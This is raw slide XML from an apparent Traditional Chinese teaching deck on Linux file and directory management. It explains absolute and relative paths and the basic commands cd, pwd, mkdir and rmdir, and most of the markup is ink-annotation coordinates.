              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>檔案與目錄管理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="44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833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標題 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="129828"/>
            <a:ext cx="7488832" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>絕對路徑與相對路徑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467971" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1989138"/>
            <a:ext cx="8229600" cy="4137025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" smtClean="0">
              <a:latin typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467972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defRPr kumimoji="1" sz="3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>
              <a:defRPr kumimoji="1" sz="28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fld id="{7F15AC57-8F7C-40BF-B3AB-609CAEB1304C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="467973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72"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="676275" y="1773238"/>
            <a:ext cx="7383463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筆跡 1"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4070520" y="3867120"/>
              <a:ext cx="635040" cy="286200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="筆跡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54680" y="3803760"/>
                <a:ext cx="666720" cy="41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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3200400" y="3156120"/>
              <a:ext cx="501840" cy="2988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184560" y="3092760"/>
                <a:ext cx="533520" cy="42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筆跡 3"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2298600" y="3098880"/>
              <a:ext cx="838800" cy="393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282760" y="3035520"/>
                <a:ext cx="870480" cy="52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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2279520" y="3238560"/>
              <a:ext cx="286200" cy="34956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63680" y="3175200"/>
                <a:ext cx="317880" cy="47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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2076480" y="4038480"/>
              <a:ext cx="419400" cy="4194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060640" y="3975120"/>
                <a:ext cx="451080" cy="54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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1974960" y="4210200"/>
              <a:ext cx="565560" cy="4766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959120" y="4146840"/>
                <a:ext cx="597240" cy="60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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4057560" y="3898800"/>
              <a:ext cx="108360" cy="12744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041720" y="3835440"/>
                <a:ext cx="14004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9" name="筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4127400" y="3784680"/>
              <a:ext cx="40680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111560" y="3721320"/>
                <a:ext cx="4384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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="876240" y="2025720"/>
              <a:ext cx="2432520" cy="23306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66880" y="2016360"/>
                <a:ext cx="2451240" cy="234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2269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絕對路徑與相對路徑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="19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39552" y="1412775"/>
            <a:ext cx="8352928" cy="4226099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8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079640" y="2419200"/>
              <a:ext cx="58428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63800" y="2355840"/>
                <a:ext cx="6159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2197080" y="2368440"/>
              <a:ext cx="578160" cy="259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81240" y="2305080"/>
                <a:ext cx="6098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1104840" y="2584440"/>
              <a:ext cx="43848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89000" y="2521080"/>
                <a:ext cx="47016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2616120" y="2597040"/>
              <a:ext cx="552960" cy="259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00280" y="2533680"/>
                <a:ext cx="58464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1079640" y="3905280"/>
              <a:ext cx="2324160" cy="5112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63800" y="3841920"/>
                <a:ext cx="235620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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1009800" y="4133880"/>
              <a:ext cx="2508480" cy="7668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93600" y="4070520"/>
                <a:ext cx="254052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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1143000" y="5219640"/>
              <a:ext cx="360" cy="3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27160" y="5156280"/>
                <a:ext cx="320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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2006640" y="5156280"/>
              <a:ext cx="838440" cy="5760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990800" y="5092560"/>
                <a:ext cx="8701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3" name="筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1092240" y="5454720"/>
              <a:ext cx="19080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076400" y="5391000"/>
                <a:ext cx="2224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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2089080" y="5467320"/>
              <a:ext cx="819720" cy="5760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073240" y="5403960"/>
                <a:ext cx="85140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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1066680" y="3949560"/>
              <a:ext cx="360" cy="36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050840" y="3886200"/>
                <a:ext cx="320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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1104840" y="4121280"/>
              <a:ext cx="2565720" cy="13356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89000" y="4057560"/>
                <a:ext cx="259740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" name="筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1225440" y="3924360"/>
              <a:ext cx="1676880" cy="9540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209600" y="3860640"/>
                <a:ext cx="1708560" cy="22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8911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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>『作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>業系統』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>電腦系統的總管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，它負責所有計算資源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>共享</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>且提供各個硬體裝置間彼此溝通的管道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。有了作業系統，用戶與應用程式就不需要直接操控硬體，它們只需透過作業系統便可以得到所要的系統服務。如此不僅讓應用程式獨立於硬體之外，更可以在需求有衝突時獲得公平合理的解決。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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zh-TW" altLang="zh-TW" b="1" dirty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何謂作業系統</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2723760" y="2090160"/>
              <a:ext cx="2815200" cy="133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07920" y="2026440"/>
                <a:ext cx="284688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7445880" y="1528200"/>
              <a:ext cx="790560" cy="201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430040" y="1464840"/>
                <a:ext cx="82224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7040880" y="1580760"/>
              <a:ext cx="1019160" cy="3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025040" y="1517040"/>
                <a:ext cx="10508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6662160" y="2076840"/>
              <a:ext cx="725400" cy="20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646320" y="2013480"/>
                <a:ext cx="7570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005840" y="2527560"/>
              <a:ext cx="4827240" cy="982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90000" y="2464200"/>
                <a:ext cx="485892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6270120" y="2553840"/>
              <a:ext cx="176760" cy="36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254280" y="2490120"/>
                <a:ext cx="2084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7112880" y="2560320"/>
              <a:ext cx="1143360" cy="68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097040" y="2496960"/>
                <a:ext cx="11750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38000" y="3108960"/>
              <a:ext cx="725400" cy="36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22160" y="3045600"/>
                <a:ext cx="7570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1743840" y="3036960"/>
              <a:ext cx="745200" cy="36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728000" y="2973600"/>
                <a:ext cx="77688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2945880" y="3082680"/>
              <a:ext cx="1156320" cy="331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929680" y="3019320"/>
                <a:ext cx="118836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6662160" y="2971468"/>
              <a:ext cx="3141720" cy="72000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback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646320" y="2908108"/>
                <a:ext cx="31734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1032120" y="3546720"/>
              <a:ext cx="614160" cy="460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016280" y="3483000"/>
                <a:ext cx="64584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7099560" y="3585600"/>
              <a:ext cx="986760" cy="720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083720" y="3522240"/>
                <a:ext cx="101844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筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1809360" y="3997080"/>
              <a:ext cx="1332720" cy="7200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="筆跡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793520" y="3933720"/>
                <a:ext cx="136440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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5812920" y="4056120"/>
              <a:ext cx="2136240" cy="117720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="筆跡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797080" y="3992400"/>
                <a:ext cx="2167920" cy="24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0" name="筆跡 19"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="875160" y="4539240"/>
              <a:ext cx="1894680" cy="39600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="筆跡 19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859320" y="4475880"/>
                <a:ext cx="192636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1" name="筆跡 20"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5042160" y="4617720"/>
              <a:ext cx="549000" cy="6840"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="筆跡 20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5026320" y="4554360"/>
                <a:ext cx="58068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2" name="筆跡 21"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6368040" y="4552560"/>
              <a:ext cx="1953360" cy="39240"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="筆跡 21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352200" y="4488840"/>
                <a:ext cx="198504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筆跡 22"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1071360" y="5048640"/>
              <a:ext cx="2775960" cy="13680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="筆跡 22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055160" y="4985280"/>
                <a:ext cx="2808000" cy="14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1100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 smtClean="0"/>
              <a:t>目錄的相關操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="20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23528" y="2276872"/>
            <a:ext cx="8564452" cy="2592288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0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筆跡 3"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="190440" y="2851200"/>
              <a:ext cx="2495880" cy="446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4600" y="2787480"/>
                <a:ext cx="252756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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="88920" y="3149640"/>
              <a:ext cx="3022920" cy="159120"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="筆跡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3080" y="3086280"/>
                <a:ext cx="3054600" cy="28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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="393840" y="3898800"/>
              <a:ext cx="4743720" cy="12096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78000" y="3835440"/>
                <a:ext cx="477540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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="419040" y="4254480"/>
              <a:ext cx="6153480" cy="1465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03200" y="4191120"/>
                <a:ext cx="618516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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="361800" y="679320"/>
              <a:ext cx="1441800" cy="14799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45960" y="615960"/>
                <a:ext cx="1473840" cy="1607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5040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0085799"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="775607" y="1660753"/>
          <a:ext cx="7480119" cy="3929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8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913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8581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3400" dirty="0" smtClean="0"/>
                        <a:t>指令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功能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58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3400" dirty="0" smtClean="0"/>
                        <a:t>cd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改變用戶當前所在目錄路徑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58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3400" dirty="0" err="1" smtClean="0"/>
                        <a:t>pwd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列出用戶當前所在的目錄路徑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858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3400" dirty="0" err="1" smtClean="0"/>
                        <a:t>mkdir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3400" dirty="0" smtClean="0"/>
                        <a:t>建立一個新目錄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58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3400" dirty="0" err="1" smtClean="0"/>
                        <a:t>rmdir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3400" dirty="0" smtClean="0"/>
                        <a:t>刪除一個目錄及目錄內的檔案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目錄操作指令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1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412920" y="317520"/>
              <a:ext cx="1098720" cy="145440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6720" y="254160"/>
                <a:ext cx="1130760" cy="158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442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400" dirty="0" smtClean="0"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>讓用戶在不同的目錄間切換，但該用戶必須擁有足夠的權限進入目的目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>cd [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目的目錄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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>d /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：返回到根目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>d ..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>到上一層目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>指令不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>帶參數執行時，就會進入主</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>目錄。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="34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/>
              <a:t>cd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561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400" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>工作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄，執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令可立刻得知目前所在工作目錄的絕對路徑名稱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pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [--help][--version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>]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pwd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3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927000" y="1600200"/>
              <a:ext cx="749880" cy="446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11160" y="1536840"/>
                <a:ext cx="78156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092400" y="1606680"/>
              <a:ext cx="521280" cy="3816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76560" y="1542960"/>
                <a:ext cx="5529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3168720" y="1587600"/>
              <a:ext cx="2140200" cy="8280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152880" y="1523880"/>
                <a:ext cx="21718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2362320" y="2057400"/>
              <a:ext cx="4019760" cy="511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346480" y="1994040"/>
                <a:ext cx="405144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042320" y="2114640"/>
              <a:ext cx="1111320" cy="8928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26120" y="2050920"/>
                <a:ext cx="114336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1047600" y="2610000"/>
              <a:ext cx="1092600" cy="6372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31760" y="2546280"/>
                <a:ext cx="1124280" cy="190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5962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600" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>指令可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>創建目錄名稱指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>的目錄並同時設置目錄的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄名稱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/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-m&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄屬性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>--mode&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄屬性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄時同時設置目錄的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>parents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>新建目錄的父目錄目前尚未建立，則會一併自動創建這個父目錄。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mkdir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4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4133880" y="666720"/>
              <a:ext cx="736920" cy="385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18040" y="603360"/>
                <a:ext cx="7686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892680" y="1600200"/>
              <a:ext cx="1409760" cy="511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76840" y="1536840"/>
                <a:ext cx="1441800" cy="17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0009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600" dirty="0" err="1" smtClean="0"/>
              <a:t>rmdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>指令可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>刪除目錄名稱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>rmdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="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rmdir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5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4000320" y="654120"/>
              <a:ext cx="965880" cy="3852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84480" y="590400"/>
                <a:ext cx="9975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409920" y="1549440"/>
              <a:ext cx="1416600" cy="766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94080" y="1485720"/>
                <a:ext cx="1448280" cy="20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9073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100" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
